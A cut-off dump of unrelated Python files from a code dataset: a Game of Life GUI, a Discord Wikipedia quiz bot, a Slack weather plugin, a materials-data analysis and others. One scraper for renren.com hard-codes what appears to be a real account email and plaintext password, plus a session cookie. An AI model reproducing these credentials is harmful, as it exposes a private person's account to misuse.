x in range(self.size):\n line = []\n for y in range(self.size):\n line.append(\n self.can.create_rectangle(\n y * self.cell_sz,\n x * self.cell_sz,\n y * self.cell_sz + self.cell_sz,\n x * self.cell_sz + self.cell_sz,\n fill=self.colors[self.grid[x][y]]\n )\n )\n cells.append(line)\n return cells\n\n def click(self, evt):\n x, y = evt.y // self.cell_sz, evt.x // self.cell_sz\n self.grid[x][y] = {0: 1, 1: 0}[self.grid[x][y]]\n self.can.itemconfigure(\n self.cells[x][y], fill=self.colors[self.grid[x][y]])\n\n def move(self, evt):\n x, y = evt.y // self.cell_sz, evt.x // self.cell_sz\n self.can.delete(\"preview\")\n self.can.create_rectangle(\n y * self.cell_sz,\n x * self.cell_sz,\n y * self.cell_sz + self.cell_sz,\n x * self.cell_sz + self.cell_sz,\n fill=\"white\",\n tag=\"preview\"\n )\n\n def clear(self):\n self.animation_on = False\n self.bt_play.configure(text=\">\")\n self.grid = [[0 for i in range(self.size)] for i in range(self.size)]\n self.generation_nb.set(0)\n for x in range(self.size):\n for y in range(self.size):\n self.can.itemconfigure(self.cells[x][y], fill=self.colors[0])\n\n def copyGrid(self, grid):\n new_grid = []\n for x in range(len(grid)):\n line = []\n for y in range(len(grid[x])):\n line.append(grid[x][y])\n new_grid.append(line)\n return new_grid\n\n def inBoundaries(self, x, y):\n return x in range(self.size) and y in range(self.size)\n\n def countNeighbrs(self, grid, x, y):\n count = 0\n for n in [\n (-1, -1), (-1, 0), (-1, 1),\n (0, -1), (0, 1),\n (1, -1), (1, 0), (1, 1)\n ]:\n if self.inBoundaries(x + n[0], y + n[1]):\n if grid[x + n[0]][y + n[1]] == 1:\n count += 1\n return count\n\n def toggleAnimation_space(self, evt):\n self.animation_on = not self.animation_on\n if self.animation_on:\n self.animate()\n self.bt_play.configure(text=\"||\")\n else:\n self.bt_play.configure(text=\">\")\n\n def toggleAnimation_button(self):\n self.animation_on = not self.animation_on\n if self.animation_on:\n self.animate()\n self.bt_play.configure(text=\"||\")\n else:\n self.bt_play.configure(text=\">\")\n\n def animate(self):\n if self.animation_on:\n self.can.delete(\"preview\")\n new_grid = self.copyGrid(self.grid)\n for x in range(self.size):\n for y in range(self.size):\n neighbrs = self.countNeighbrs(self.grid, x, y)\n if self.grid[x][y] == 0 and neighbrs == 3:\n new_grid[x][y] = 1\n self.can.itemconfigure(\n self.cells[x][y], fill=self.colors[1])\n elif self.grid[x][y] == 1 and neighbrs not in range(2, 4):\n new_grid[x][y] = 0\n self.can.itemconfigure(\n self.cells[x][y], fill=self.colors[0])\n self.grid = self.copyGrid(new_grid)\n self.generation_nb.set(self.generation_nb.get() + 1)\n self.after(50, self.animate)\n\n def step(self):\n self.animation_on = False\n self.can.delete(\"preview\")\n new_grid = self.copyGrid(self.grid)\n for x in range(self.size):\n for y in range(self.size):\n neighbrs = self.countNeighbrs(self.grid, x, y)\n if self.grid[x][y] == 0:\n if neighbrs == 3:\n new_grid[x][y] = 1\n self.can.itemconfigure(\n self.cells[x][y], fill=self.colors[1])\n else:\n if neighbrs not in range(2, 4):\n new_grid[x][y] = 0\n self.can.itemconfigure(\n self.cells[x][y], fill=self.colors[0]\n )\n self.grid = self.copyGrid(new_grid)\n self.generation_nb.set(self.generation_nb.get() + 1)\n\n def debug(self, evt):\n x, y = evt.y // self.cell_sz, evt.x // self.cell_sz\n print(self.countNeighbrs(x, y))\n\n\nif __name__ == \"__main__\":\n app = GameOfLife(None)\n app.mainloop()\n","sub_path":"game_of_life.py","file_name":"game_of_life.py","file_ext":"py","file_size_in_byte":6714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"440224903","text":"#!/usr/bin/env python3\n# -*- coding: iso-8859-1 -*-\n# -*- coding: latin-1 -*-\n# & Loreto Notarantonio 2015, October\n# ######################################################################################\n\nimport pyudev # sudo pip3.4 --proxy=localhost:60080 install pyudev\n\n# ##########################################################################\n# # setupRS485(usbDevice)\n# ##########################################################################\ndef isUsbDevice(usbDevName):\n usbDevPath = None\n\n if usbDevName:\n usbDevName = usbDevName.split('/')[-1] # nel caso fosse stato passato anche il path lo togliamo\n context = pyudev.Context()\n\n\n try:\n usbDevPath = '/dev/' + usbDevName\n isVaildDevice = pyudev.Device.from_device_file(context, usbDevPath) == (pyudev.Device.from_name(context, 'tty', usbDevName))\n except:\n isVaildDevice = False\n usbDevPath = None\n # print('{0} - is not a valid USB device'.format(usbDevPath))\n # sys.exit()\n\n # print (isVaildDevice)\n return usbDevPath\n\n","sub_path":"Devices/isUsbDevice.py","file_name":"isUsbDevice.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"148838664","text":"from __future__ import print_function\nfrom app import mongo\nfrom random import randint\nimport sys\n\n#addFeedback(identifications, updates, gameType): void\n#calculateScores(data1, data2, category, gameType): int, int\n#askNell(entity): list\n#existsInNell(entity, category): tuple(bool, float)\n#generateData(identifications, uniqueKey, sortCriteria, maxValues): list\n#pickRandomFeedback(identifications, sortCriteria, maxValues): dict\n\n#initial identifications: entity, category\n#initial updates: score, count\ndef addFeedback(identifications, updates, gameType):\n\tupdates[\"isInNell\"] = (updates[\"score\"] != -1 and not updates[\"lazy\"])\n\tcursor = mongo.db.feedbacks.find(identifications)\n\tif cursor.count() > 0:\n\t\tupdates[\"count\"] += cursor[0][\"count\"]\n\t\tmongo.db.feedbacks.update_one(identifications, {\"$set\": updates})\n\telse:\n\t\tupdates[\"gameType\"] = gameType\n\t\tmongo.db.feedbacks.insert_one(dict(identifications.items() + updates.items()))\n\ndef askNell(entity):\n\timport json\n\timport urllib2\n\toccurrences = []\n\turl = 'http://rtw.ml.cmu.edu/rtw/api/json0?lit1=' + entity.replace(\" \", \"+\") + '&predicate=*'\n\tjson_dict = json.load(urllib2.urlopen(url))\n\tif \"items\" in json_dict.keys():\n\t\tfor i in json_dict[\"items\"]:\n\t\t\tif \"predicate\" in i.keys():\n\t\t\t\tif \"justifications\" in i.keys() and len(i[\"justifications\"]) >= 1 and \"score\" in i[\"justifications\"][0].keys():\n\t\t\t\t\toccurrences.append((i[\"predicate\"], i[\"justifications\"][0][\"score\"]))\n\treturn occurrences\n\ndef existsInNell(entity, category):\n\t#communicate with ask nell, returns the list of occurrences of entity\n\toccurrences = askNell(entity)\n\tfor o in occurrences:\n\t\tif str(o[0]) == category:\n\t\t\treturn True, float(o[1])\n\treturn False, -1\n\ndef calculateScores(player1, player2, category, gameType):\n\tif gameType == 1:\n\t\tscore1, score2 = 0, 0\n\t\tfor e in player1:\n\t\t\tif e != \"\":\n\t\t\t\texists, score = existsInNell(e, category)\n\t\t\t\tidentifications = dict()\n\t\t\t\tidentifications[\"entity\"] = e\n\t\t\t\tidentifications[\"category\"] = category\n\t\t\t\tupdates = dict()\n\t\t\t\tupdates[\"lazy\"] = False\n\t\t\t\tif exists:\n\t\t\t\t\tupdates[\"score\"] = score\n\t\t\t\t\tif score > 0.7:\n\t\t\t\t\t\tif e in player2:\n\t\t\t\t\t\t\tupdates[\"count\"] = 2\n\t\t\t\t\t\t\tscore1 += 10\n\t\t\t\t\t\t\tscore2 += 10\n\t\t\t\t\t\t\tplayer2.remove(e)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tupdates[\"count\"] = 1\n\t\t\t\t\t\t\tscore1 += 4\n\t\t\t\t\telse:\n\t\t\t\t\t\tif e in player2:\n\t\t\t\t\t\t\tupdates[\"count\"] = 2\n\t\t\t\t\t\t\tscore1 += 12\n\t\t\t\t\t\t\tscore2 += 12\n\t\t\t\t\t\t\tplayer2.remove(e)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tupdates[\"count\"] = 1\n\t\t\t\t\t\t\tscore1 += 7\n\t\t\t\telse:\n\t\t\t\t\tupdates[\"score\"] = -1\n\t\t\t\t\tif e in player2:\n\t\t\t\t\t\tupdates[\"count\"] = 2\n\t\t\t\t\t\tscore1 += 15\n\t\t\t\t\t\tscore2 += 15\n\t\t\t\t\t\tplayer2.remove(e)\n\t\t\t\t\telse:\n\t\t\t\t\t\tupdates[\"count\"] = 1\n\t\t\t\t\t\tscore1 += 2\n\t\t\t\taddFeedback(identifications, updates, gameType)\n\n\t\tfor e in player2:\n\t\t\tif e != \"\":\n\t\t\t\texists, score = existsInNell(e, category)\n\t\t\t\tidentifications = dict()\n\t\t\t\tidentifications[\"entity\"] = e\n\t\t\t\tidentifications[\"category\"] = category\n\t\t\t\tupdates = dict()\n\t\t\t\tupdates[\"lazy\"] = False\n\t\t\t\tupdates[\"count\"] = 1\n\t\t\t\tif exists:\n\t\t\t\t\tupdates[\"score\"] = score\n\t\t\t\t\tif score > 0.7:\n\t\t\t\t\t\tscore2 += 4\n\t\t\t\t\telse:\n\t\t\t\t\t\tscore2 += 7\n\t\t\t\telse:\n\t\t\t\t\tupdates[\"score\"] = -1\n\t\t\t\t\tscore2 += 2\n\t\t\t\taddFeedback(identifications, updates, gameType)\n\n\t\treturn score1, score2\n\treturn -1, -1\n\ndef generateData(identifications, sortCriteria, maxValues):\n\tcursor = mongo.db.feedbacks.find(identifications).sort(sortCriteria)\n\tdata = []\n\tif cursor.count() > 0:\n\t\tfor i in range(min(maxValues, cursor.count())): \n\t\t\tdata.append(str(cursor[i][\"entity\"]))\n\treturn data\n\ndef pickRandomFeedback(identifications, sortCriteria, maxValues):\n\tdata = generateData(identifications, sortCriteria, maxValues)\n\trand = randint(0, len(data) - 1)\n\treturn data[rand]\n\n","sub_path":"rtw.py","file_name":"rtw.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"630109230","text":"import discord\r\nfrom discord.ext import commands\r\nimport random\r\nimport wikipedia\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs4\r\n\r\n\r\nclass QuizCog(commands.Cog):\r\n \"\"\"\r\n クイズボット\r\n \"\"\"\r\n\r\n wikipedia.set_lang(\"ja\")\r\n\r\n wikipedia_page = wikipedia.page(\"wikipedia\")\r\n wordlist = []\r\n\r\n @commands.group(aliases=['q'])\r\n async def quiz_wikipedia(self, ctx):\r\n \"\"\"wikipedia問題\"\"\"\r\n if ctx.invoked_subcommand is None:\r\n embed = discord.Embed(\r\n title=\"wikipediaクイズ機能\",\r\n description=\"wikipediaクイズ機能の使い方です。\"\r\n )\r\n\r\n embed.add_field(\r\n name=\"get\", value=\"wikipediaからランダムなページを取得する\\n e.q get\", inline=False)\r\n embed.add_field(\r\n name=\"one\", value=\"取得中のwikipediaページの一行目を表示する\\n e.q one\", inline=False)\r\n embed.add_field(\r\n name=\"summary\", value=\"取得中のwikipediaページのサマリーを表示する\\n e.q summary\", inline=False)\r\n embed.add_field(\r\n name=\"answer [, True]\",\r\n value=\"取得中のwikipediaページのタイトルを表示する\\nTrueをつけると隠し文字で表示する\\n e.q answer\", inline=False)\r\n embed.add_field(\r\n name=\"url\", value=\"取得中のwikipediaページのurlを表示する\\n e.q url\", inline=False)\r\n embed.add_field(\r\n name=\"find\", value=\"指定した単語のwikipediaのページを取得する\\n e.q find 'target-word'\", inline=False)\r\n embed.add_field(\r\n name=\"create_list (history|science|etc...)\", value=\"単語帳を作成する\\n e.q cl history\", inline=False)\r\n embed.add_field(\r\n name=\"get_in_list\", value=\"単語帳からランダムな単語のwikipediaページを取得する\\n e.q gil\", inline=False)\r\n embed.add_field(\r\n name=\"hint\", value=\"現在取得しているwikipediaのタイトル単語の文字ヒントを出す\\n e.q hint (wo1|se2)\", inline=False)\r\n\r\n await ctx.send(embed=embed)\r\n\r\n @quiz_wikipedia.command(aliases=['get', 'g'])\r\n async def get_random_wikipedia_page(self, ctx):\r\n \"\"\"wikipediaからランダムな記事を一つ取得する\"\"\"\r\n\r\n await ctx.send(\"妹「wikipediaからランダムな記事を取ってくるね!」\")\r\n await ctx.send(\"妹は中空に手を翳し、何かを掴むような動作をしている。\")\r\n\r\n # 日本語wikipediaからランダムな単語を一つ決めてページを取得する\r\n self.wikipedia_page = wikipedia.page(wikipedia.random())\r\n\r\n await ctx.send(\"妹「ランダムな記事を取ってきたよ!」\")\r\n\r\n def do_hide_words(self, s: str):\r\n \"\"\"答えがそのまま記載されている場合が多いので、マスクする\"\"\"\r\n\r\n hide_words = [self.wikipedia_page.title]\r\n space_word = s[:s.find(\"(\")]\r\n hide_words.append(space_word)\r\n hide_words.append(\r\n self.wikipedia_page.title.replace(\" \", \"\")) # 「霧雨 魔理沙」を「霧雨魔理沙」でもヒットするように\r\n # 「Python(パイソン)は、...」の「パイソン」を取得する\r\n # 「ウォルト・ディズニー(Walt Disney, 1901年12月5日 - 1966年12月15日)...」とある場合、日付は削除したくないので句読点で避ける\r\n punctuation_mark = [\",\", \"、\"]\r\n start_parentheses = s.find(\"(\")\r\n end_parentheses = s.find(\")\")\r\n end_para = end_parentheses\r\n for mark in punctuation_mark:\r\n mark_position = s.find(mark)\r\n if start_parentheses < mark_position < end_parentheses:\r\n end_para = mark_position\r\n para_title = s[s.find(\"(\") + 1: end_para]\r\n\r\n hide_words.append(para_title)\r\n\r\n # **ANSWER**でマスクする\r\n for hide_word in hide_words:\r\n s = s.replace(hide_word, \"**ANSWER**\")\r\n\r\n return s\r\n\r\n @quiz_wikipedia.command(aliases=['one', 'o'])\r\n async def print_one_summary(self, ctx):\r\n \"\"\"一行表示\"\"\"\r\n s = self.wikipedia_page.summary # まずサマリーを取得する\r\n one_line = s[:s.find(\"\\n\")] # 最初の改行が来るまでを取得する\r\n\r\n # 答えがそのまま記載されている場合が多いので、マスクする\r\n question_sentence = self.do_hide_words(one_line)\r\n\r\n await ctx.send(question_sentence)\r\n\r\n @quiz_wikipedia.command(aliases=['summary', 's'])\r\n async def print_summary(self, ctx):\r\n \"\"\"サマリー表示\"\"\"\r\n summary = self.wikipedia_page.summary\r\n question_sentence = self.do_hide_words(summary)\r\n await ctx.send(question_sentence)\r\n\r\n @quiz_wikipedia.command(aliases=['answer', 'title', 'a'])\r\n async def print_answer(self, ctx, spoiler=False):\r\n \"\"\"答え表示\"\"\"\r\n await ctx.send(f'妹「答えは「**{\"||\"*spoiler}{self.wikipedia_page.title}{\"||\"*spoiler}**」だよ!」')\r\n\r\n @quiz_wikipedia.command(aliases=['url'])\r\n async def print_url(self, ctx):\r\n \"\"\"URLを表示\"\"\"\r\n await ctx.send(self.wikipedia_page.url)\r\n\r\n @quiz_wikipedia.command(aliases=['find', 'page'])\r\n async def get_wikipedia_page(self, ctx, target_word: str):\r\n \"\"\"指定した単語のwikipediaページを取得する\"\"\"\r\n self.wikipedia_page = wikipedia.page(target_word)\r\n await ctx.send(\"妹「調べてきたよ!お兄ちゃん!」\")\r\n\r\n @quiz_wikipedia.command(aliases=['hint'])\r\n async def print_hint(self, ctx, key: str):\r\n if key.startswith(\"wo\"):\r\n word_position = int(key[2:])\r\n await ctx.send(f'妹「{word_position}文字目は「{self.wikipedia_page.title[word_position - 1]}」だよ!」')\r\n if key == \"se2\":\r\n se2 = self.wikipedia_page.summary\r\n s1 = se2.find(\"\\n\")\r\n se2 = se2[s1: se2.find(\"\\n\", s1 + 1)]\r\n se2 = self.do_hide_words(se2)\r\n await ctx.send(\"妹「サマリーの二行目は\\n「\" + se2 + \"\\n」だよ!」\")\r\n\r\n @quiz_wikipedia.command(aliases=['cl', 'create_list'])\r\n async def create_wordlist(self, ctx, target: str):\r\n await ctx.send(\"妹「単語帳を作るよ!」\")\r\n await ctx.send(\"妹は懸命にペンを動かしている。\")\r\n if target == 'history':\r\n self.wordlist = self.get_history_words()\r\n if target == 'science':\r\n self.wordlist = self.get_science_words()\r\n\r\n await ctx.send(\"妹「単語帳を作成したよ!」\")\r\n\r\n def get_history_words(self):\r\n \"\"\"単語帳を作成する。\r\n\r\n 対象は'http://socialstudies.boy.jp/page-994/'にある歴史人物\r\n \"\"\"\r\n url = 'http://socialstudies.boy.jp/page-994/'\r\n page = requests.get(url)\r\n soup = bs4(page.content, 'lxml')\r\n tag_words = soup.find_all(class_='column-1')\r\n words = [word.string for word in tag_words]\r\n\r\n return words\r\n\r\n def get_science_words(self):\r\n \"\"\"理化用の単語帳を作成する\"\"\"\r\n\r\n url = 'http://rikamato.com/2017/12/15/science_word/'\r\n page = requests.get(url)\r\n soup = bs4(page.content, 'lxml')\r\n tag_words = soup.find_all('tr')\r\n words = [word.text.split(\"\\n\")[1] for word in tag_words[1:]]\r\n\r\n return words\r\n\r\n @quiz_wikipedia.command(aliases=['gil', 'get_in_list'])\r\n async def get_wikipedia_page_for_wordlist(self, ctx):\r\n \"\"\"作成した単語帳からランダムで単語を選び、その単語でwikipediaのページを取得する\"\"\"\r\n\r\n await ctx.send(\"妹「単語帳から適当に問題に出すね!」\")\r\n random_word = random.choice(self.wordlist)\r\n self.wikipedia_page = wikipedia.page(random_word)\r\n await ctx.send(\"妹は問題を書きとめ、あなたからの質問に応える気が十分なようだ\")\r\n\r\n @quiz_wikipedia.command(aliases=['d_show_wordlist'])\r\n async def show_wordlist(self, ctx):\r\n \"\"\"デバッグ用。wordlistを見る\r\n\r\n Discordの出力文字数限界が2000なので、2000未満の表示とする\"\"\"\r\n print(\", \".join(self.wordlist)[:1000] + \"...\")\r\n","sub_path":"quizcog.py","file_name":"quizcog.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"632355274","text":"from __future__ import unicode_literals\n# don't convert to ascii in py2.7 when creating string to return\nimport yaml\nimport urllib2\nimport json\n\n# Import variables from config file\nconfig = yaml.load(open('plugins/weather.conf', 'r'))\n\nweather_url = config.get('WEATHER_URL')\n\noutputs = []\n\n\ndef get_weather(weather_url):\n f = urllib2.urlopen(weather_url)\n weather_json = f.read()\n f.close()\n w = json.loads(weather_json)\n\n weather_forecast = str(\n \"Location: \" + w['current_observation']['display_location']['full'] + \"\\n\" +\n \"Station: \" + w['current_observation']['station_id'] + \"\\n\" +\n \"Current temp: \" + w['current_observation']['temperature_string'] + \"\\n\" +\n \"Feels like: \" + w['current_observation']['feelslike_string'] + \"\\n\" +\n \"Relative humidity: \" + w['current_observation']['relative_humidity'] + \"\\n\" +\n \"Wind: \" + w['current_observation']['wind_string'] + \"\\n\" +\n \"Weather: \" + w['current_observation']['weather'] + \"\\n\"\n )\n\n return weather_forecast\n\ndef process_message(data):\n if data['text'] == 'weather':\n # Get weather and store in a variable\n weather_forecast = get_weather(weather_url)\n\n # Respond with weather forecast\n outputs.append([data['channel'], weather_forecast])\n","sub_path":"docs/example-plugins/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"95088401","text":"import requests\n\"\"\"\n使用requests请求登录后网页的思路:\n实例化session\n先使用session发送请求,登录网站,把cookie保存在session中\n再使用session请求登录后的网站,session能够自动携带登录成功时保存在其中的cookie进行请求\n\"\"\"\n\n\ndef str_to_dict(cookies_str):\n cookies_dist = {i.split(\"=\")[0]: i.split(\"=\")[1] for i in cookies_str.split(\"; \")}\n return cookies_dist\n\n\ndef main():\n session = requests.Session()\n login_url = 'http://www.renren.com/PLogin.do'\n data = {\n \"email\": '269524963@qq.com',\n \"password\": 'aptx4869..slj'\n }\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Mobile Safari/537.36',\n }\n\n # cookie: 'anonymid=k67hxshe-1vtmfm; _r01_=1; taihe_bi_sdk_uid=b9aa06bdb29d4e402a8209714fddbd5d; depovince=ZGQT; JSESSIONID=abcX7vNjbqDJ2azTEj0ax; taihe_bi_sdk_session=511521bb980dcaa60043c170a7574553; ick_login=69707d7d-c636-40ed-ae71-046562d5ce52; id=973614509; ver=7.0; loginfrom=null; wp_fold=0; ick=f3ada514-d0de-4116-8ef8-e2670631bb99; t=42f97870e5d5a5a25df456e4dc544a2f9; societyguester=42f97870e5d5a5a25df456e4dc544a2f9; xnsid=cbd32a1b; jebecookies=a3680de3-1307-4c64-add7-aac74d259129|||||'\n # cookie = str_to_dict(cookie)\n # res = session.get(url=profile_url, headers=headers, cookies=cookies)\n\n # 使用session发送请求,将cookie保存在其中\n session.post(url=login_url, data=data, headers=headers)\n # 在同一次会话中共享cookie,后面直接打开个人主页\n profile_url = 'http://www.renren.com/973614509/newsfeed/photo'\n res = session.get(url=profile_url, headers=headers)\n with open('profile.html', 'w', encoding='utf-8') as f:\n f.write(res.content.decode('utf-8'))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"spider/req_session.py","file_name":"req_session.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"116512988","text":"import ase.db\nimport warnings\nimport numpy\nimport matplotlib.pyplot as plt\nfrom ase.data import covalent_radii\nfrom scipy.stats import linregress\nimport os, os.path\nfrom scipy.constants import pi, epsilon_0\n\ndb_file = \"../../data/gpaw_data/c2db.db\"\nif not os.path.exists(db_file):\n raise FileExistsError((\"Please download the c2db data into ../../data/gpaw_data/ folder,\"\n \"from https://cmr.fysik.dtu.dk/_downloads/c2db.db\"))\n\n\ndb = ase.db.connect(db_file)\nvalence = numpy.load(\"../post_processing/valence.npy\")\npol = numpy.load(\"../post_processing/valence.npy\")\n\n\ndef get_thick(atom_row):\n pos = atom_row.positions[:, -1]\n diff = covalent_radii[atom_row.numbers]\n zmax = numpy.max(pos + diff) - numpy.min(pos - diff)\n vals = valence[atom_row.numbers] # valence electrons\n atom_pol = pol[atom_row.numbers]\n A = atom_row.cell_area\n return zmax, sum(vals) / A, sum(atom_pol) / A\n\n\ndef get_data():\n candidates = db.select(selection=\"gap_gw>0.5\")\n candidates = db.select(selection=\"gap_gw>0.05\")\n materials = []\n alpha_x = []\n alpha_z = []\n Eg_HSE = []\n Eg_GW = []\n Eg_PBE = []\n thick = []\n n_2D = []\n polar = []\n\n for mol in candidates:\n if \"Cr\" in mol.formula: # CrS2 stuffs are not correct?\n continue\n print(\"{0}-{1}\".format(mol.formula, mol.prototype))\n togo = True\n for attrib in (\"gap\", \"gap_hse\",\n \"gap_gw\", \"alphax\", \"alphaz\"):\n if not hasattr(mol, attrib):\n warnings.warn(\"{0} doesn't have attribute {1}!\".format(mol.formula,\n attrib))\n togo = False\n if togo is not True:\n warnings.warn(\"{0} not calculated!\".format(mol.formula))\n continue\n materials.append(\"{0}-{1}\".format(mol.formula, mol.prototype))\n alpha_x.append(mol.alphax)\n alpha_z.append(mol.alphaz)\n Eg_HSE.append(mol.gap_hse)\n Eg_GW.append(mol.gap_gw)\n Eg_PBE.append(mol.gap)\n delta, n, apol = get_thick(mol)\n thick.append(delta)\n n_2D.append(n)\n polar.append(apol)\n\n print(len(alpha_x))\n alpha_x = numpy.array(alpha_x)\n alpha_z = numpy.array(alpha_z)\n Eg_HSE = numpy.array(Eg_HSE)\n Eg_GW = numpy.array(Eg_GW)\n Eg_PBE = numpy.array(Eg_PBE)\n thick = numpy.array(thick)\n n_2D = numpy.array(n_2D)\n polar = numpy.array(polar)\n return alpha_x, alpha_z, Eg_HSE, thick\n\n'''\nimg_path = \"../../tmp_img/\"\nplt.style.use(\"science\")\n\n# plt.figure(figsize=(7, 3.5)) #\n# plt.subplot(121) #\n# plt.plot(Eg_HSE, alpha_x * 4 * pi, \"o\", alpha=0.5) #\n# plt.xlabel(\"$E_{\\\\rm{g}}$ (eV)\") #\n# plt.ylabel(\"$\\\\alpha_{xx}/\\\\varepsilon_0$ ($\\\\AA$)\") #\n# #\n# plt.subplot(122) #\n# plt.plot(Eg_HSE, alpha_z * 4 * pi, \"o\", alpha=0.5) #\n# plt.xlabel(\"$E_{\\\\rm{g}}$ (eV)\") #\n# plt.ylabel(\"$\\\\alpha_{zz} / \\\\varepsilon_0$ ($\\\\AA$)\") #\n# #\n# plt.tight_layout() #\n# plt.savefig(os.path.join(img #\n # _path, \"alpha_Eg_original.svg\"))\n\n# x-direction\nplt.figure(figsize=(3.5, 3.5))\nplt.plot(Eg_HSE, 1 / (alpha_x), \"o\", alpha=0.5)\nk, b, r, *_ = linregress(x=Eg_HSE, y=1/alpha_x)\nprint(k, b, r)\nxx = numpy.linspace(0.3, 8)\nyy = k * xx + b\nplt.plot(xx, yy, \"--\")\nplt.xlabel(\"$E_{\\\\rm{g}}$ (eV)\")\nplt.ylabel(\"$(4 \\\\pi \\\\varepsilon_0)/\\\\alpha_{\\parallel}$ ($\\\\AA^{-1}$)\")\nplt.savefig(os.path.join(img_path, \"alpha_xx_1_Eg.svg\"))\n\n# z-direction\nplt.figure(figsize=(3.5, 3.5))\nplt.plot(thick, alpha_z, \"o\", alpha=0.5)\n# plt.plot(polar, alpha_z, \"o\", alpha=0.5)\nk, b, r, *_ = linregress(x=thick, y=alpha_z)\nprint(k, b, r)\nxx = numpy.linspace(2, 10)\nyy = k * xx + b\n# yyy = 1 / (4 * pi) * xx - 0.05\nplt.plot(xx, yy, \"--\")\n# plt.plot(xx, yyy, \"--\")\nplt.xlabel(\"Thickness ($\\\\AA$)\")\nplt.ylabel(\"$\\\\alpha_{\\\\perp} / (4 \\pi \\\\varepsilon_0)$ ($\\\\AA$)\")\nplt.savefig(os.path.join(img_path, \"alpha_zz_thick.svg\"))\n\n#x-direction\nplt.figure(figsize=(3.5, 3.5))\n# plt.plot(thick, alpha_z, \"o\", alpha=0.5)\nplt.plot(polar, alpha_z, \"o\", alpha=0.5)\n# k, b, r, *_ = linregress(x=thick, y=alpha_z)\n# print(k, b, r)\n# xx = numpy.linspace(2, 10)\n# yy = k * xx + b\n# yyy = 1 / (4 * pi) * xx - 0.05\n# plt.plot(xx, yy, \"--\")\n# plt.plot(xx, yyy, \"--\")\nplt.text(x=2, y=10, s=\"$\\\\alpha^{\\\\perp} = \\\\frac{\\\\hbar^2 e^2 \\\\rho_e}{m_e E_{\\mathrm{g}}^2}$\")\nplt.xlabel(\"Total Atomic Polarizability per Area (Bohr$^3$)\")\nplt.ylabel(\"$\\\\alpha^{\\\\perp} / (4 \\pi \\\\varepsilon_0)$ ($\\\\AA$)\")\nplt.savefig(os.path.join(img_path, \"alpha_zz_polar.svg\"))\n\n# z-direction with atomic polarizability\nplt.figure(figsize=(3.5, 3.5))\n# plt.plot(thick, alpha_z, \"o\", alpha=0.5)\nplt.plot(polar, alpha_x, \"o\", alpha=0.5)\nk, b, r, *_ = linregress(x=thick, y=alpha_z)\nprint(k, b, r)\n# xx = numpy.linspace(2, 10)\n# yy = k * xx + b\n# yyy = 1 / (4 * pi) * xx - 0.05\n# plt.plot(xx, yy, \"--\")\n# plt.plot(xx, yyy, \"--\")\nplt.xlabel(\"Total Atomic Polarizability per Area (Bohr$^3$)\")\nplt.ylabel(\"$\\\\alpha_{\\\\parallel} / (4 \\pi \\\\varepsilon_0)$ ($\\\\AA$)\")\nplt.savefig(os.path.join(img_path, \"alpha_xx_polar.svg\"))\n\n\n\n'''\n","sub_path":"src/VASP_HSE/gpaw_data.py","file_name":"gpaw_data.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"27999052","text":"from django.conf.urls import patterns, include, url\n\n\nurlpatterns = patterns('blog.views',\n\n url(r'makale/(?P[^/]+)/$', 'makale'),\n url(r'kategori/(?P\\d+)/$', 'kategori'),\n url(r'iletisim/$', 'iletisim'),\n url(r'arama/$', 'arama'),\n\n\n )\n\n\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"39183466","text":"#!/usr/bin/env python\n\n\"\"\"\nFor each location on David's list, extract the MAT, MAP, AI & elevation\n\nThat's all folks.\n\"\"\"\n__author__ = \"Martin De Kauwe\"\n__version__ = \"1.0 (21.09.2017)\"\n__email__ = \"mdekauwe@gmail.com\"\n\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nfrom netCDF4 import Dataset\nimport os\nimport pandas as pd\nimport csv\nimport requests\n\ndef main():\n\n df = pd.read_csv(\"SITE_LIST.csv\", header=0, sep=\",\")\n places = df.Sitename.values\n\n lats_needed = df[\"Lat_deg\"].values\n lons_needed = df[\"Long_deg\"].values\n\n # Fix units to help match the 0.5 degree data\n lats_neededx = [float(x_round(float(i))) for i in lats_needed]\n lons_neededx = [float(x_round(float(i))) for i in lons_needed]\n lats_neededr = [float(i) for i in lats_needed]\n lons_neededr = [float(i) for i in lons_needed]\n\n lats_neededx = dict(zip(places, lats_neededx))\n lons_neededx = dict(zip(places, lons_neededx))\n lats_neededr = dict(zip(places, lats_neededr))\n lons_neededr = dict(zip(places, lons_neededr))\n\n fp = open('sites_and_bioclimatic_stuff.csv', \"w\")\n\n s = \"%s,%s,%s,%s,%s,%s,%s,%s\" % (\"site\",\"lat\",\"lon\",\"elev\",\"mat\",\"map\",\"ai\",\"pet\")\n print(s, end=\"\\n\", file=fp)\n\n nrows = 360\n ncols = 720\n #f = Dataset(\"raw_data/PRE/cru_ts4.00.1971.1980.pre.dat.nc\", 'r')\n #lon = f.variables['lon'][:]\n #print(lon)\n latitudes = np.linspace(-89.75, 89.75, nrows)\n longitudes = np.linspace(-179.75, 179.75, ncols)\n\n\n mapx = np.fromfile(\"MAP_1960_2010.bin\").reshape(nrows, ncols)\n matx = np.fromfile(\"MAT_1960_2010.bin\").reshape(nrows, ncols)\n aix = 